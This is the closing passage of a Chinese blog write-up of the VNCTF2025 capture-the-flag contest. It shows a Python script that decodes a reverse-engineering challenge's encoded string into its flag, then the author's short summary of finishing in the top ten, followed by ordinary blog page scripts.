class="hljs-string">&quot;jjjliijijjjjjijiiiiijijiijjiijijjjiiiiijjjjliiijijjjjljjiilijijiiiiiljiijjiiliiiiiiiiiiiljiijijiliiiijjijijjijijijijiilijiijiiiiiijiljijiilijijiiiijjljjjljiliiijjjijiiiljijjijiiiiiiijjliiiljjijiiiliiiiiiljjiijiijiijijijjiijjiijjjijjjljiliiijijiiiijjliijiijiiliiliiiiiiljiijjiiliiijjjliiijjljjiijiiiijiijjiijijjjiiliiliiijiijijijiijijiiijjjiijjijiiiljiijiijilji&quot;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">decode</span>(<span class="hljs-params">encrypted_str</span>):<br>    decoded_str = []<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-built_in">len</span>(encrypted_str), <span class="hljs-number">5</span>):<br>        chunk = encrypted_str[i:i+<span class="hljs-number">5</span>]<br>        <span class="hljs-keyword">if</span> chunk <span class="hljs-keyword">in</span> fish_dcode:<br>            decoded_str.append(fish_dcode[chunk])<br>        <span class="hljs-keyword">else</span>:<br>            decoded_str.append(<span class="hljs-string">&#x27;?&#x27;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-string">&#x27;&#x27;</span>.join(decoded_str)<br><br>cipher = decode(encrypted_str)<br>tmp = <span class="hljs-string">&quot;&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(cipher)):<br>    tmp1 = <span class="hljs-built_in">ord</span>(cipher[i])-i%<span class="hljs-number">10</span>-<span class="hljs-built_in">ord</span>(<span class="hljs-string">&#x27;7&#x27;</span>)<br>    tmp2 = <span class="hljs-built_in">ord</span>(cipher[i])-i%<span class="hljs-number">4</span>+<span class="hljs-built_in">ord</span>(<span class="hljs-string">&#x27;1&#x27;</span>)<br>    <span class="hljs-comment"># print(tmp1,tmp2)</span><br>    <span class="hljs-keyword">if</span> <span class="hljs-built_in">ord</span>(<span class="hljs-string">&quot;a&quot;</span>)&lt;=tmp2&lt;=<span class="hljs-built_in">ord</span>(<span class="hljs-string">&quot;f&quot;</span>):<br>        tmp += <span class="hljs-built_in">chr</span>(tmp2)<br>    <span class="hljs-keyword">else</span>:<br>        tmp += <span class="hljs-built_in">chr</span>(tmp1)<br><br>newtmp = <span class="hljs-string">&quot;&quot;</span>.join(tmp[i+<span class="hljs-number">1</span>]+tmp[i] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(tmp),<span class="hljs-number">2</span>))<br>key = <span class="hljs-string">&quot;&quot;</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>,<span class="hljs-built_in">len</span>(newtmp),<span class="hljs-number">2</span>):<br>    key+=<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(newtmp[i:i+<span class="hljs-number">2</span>],<span class="hljs-number">16</span>)-<span class="hljs-number">68</span>)<br><span class="hljs-built_in">print</span>(key)<br><span class="hljs-comment"># VNCTF&#123;u_re4l1y_kn0w_H0Ok_my_f1Sh!1l&#125;</span><br></code></pre></td></tr></table></figure></li>
</ul>
<h1 id="总结"><strong>总结</strong></h1>
<p>感觉一天时间还是太少了，很多apk逆向和web题目还没仔细看，可能还是太菜了（雾），不过也是惊险挤进前十，最后签退都忘记做了🙃</p>
<figure>
<img src="/img/VNCTF2025/VNCTF2025_16.png" srcset="/img/loading.gif" lazyload alt="" /><figcaption>Final Score</figcaption>
</figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF-writeup/" class="category-chain-item">CTF writeup</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/01/21/todoList/" title="todoList">
                        <span class="hidden-mobile">todoList</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="twikoo"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#comments', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/twikoo/1.6.8/twikoo.all.min.js', function() {
        var options = Object.assign(
          {"envId":"https://wuyan1345.netlify.app/.netlify/functions/twikoo","region":"ap-shanghai","path":"window.location.pathname"},
          {
            el: '#twikoo',
            path: 'window.location.pathname',
            onCommentLoaded: function() {
              Fluid.utils.listenDOMLoaded(function() {
                var imgSelector = '#twikoo .tk-content img:not(.tk-owo-emotion)';
                Fluid.plugins.imageCaption(imgSelector);
                Fluid.plugins.fancyBox(imgSelector);
              });
            }
          }
        )
        twikoo.init(options)
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  


  
  









    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <i class="iconfont icon-copyright"></i> <a href="https://github.com/wuyan1345" target="_blank" rel="nofollow noopener"><span>2025 WuYan</span></a>
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  
      <script>
        if (!window.MathJax) {
          window.MathJax = {
            tex    : {
              inlineMath: { '[+]': [['$', '$']] }
            },
            loader : {
              load: ['ui/lazy']
            },
            options: {
              renderActions: {
                insertedScript: [200, () => {
                  document.querySelectorAll('mjx-container').forEach(node => {
                    let target = node.parentNode;
                    if (target.nodeName.toLowerCase() === 'li') {
                      target.parentNode.classList.add('has-jax');
                    }
                  });
                }, '', false]
              }
            }
          };
        } else {
          MathJax.startup.document.state(0);
          MathJax.texReset();
          MathJax.typeset();
          MathJax.typesetPromise();
        }

        Fluid.events.registerRefreshCallback(function() {
          if ('MathJax' in window && MathJax.startup.document && typeof MathJax.startup.document.state === 'function') {
            MathJax.startup.document.state(0);
            MathJax.texReset();
            MathJax.typeset();
            MathJax.typesetPromise();
          }
        });
      </script>
    

  <script  src="https://lib.baomitu.com/mathjax/3.2.2/es5/tex-mml-chtml.js" ></script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
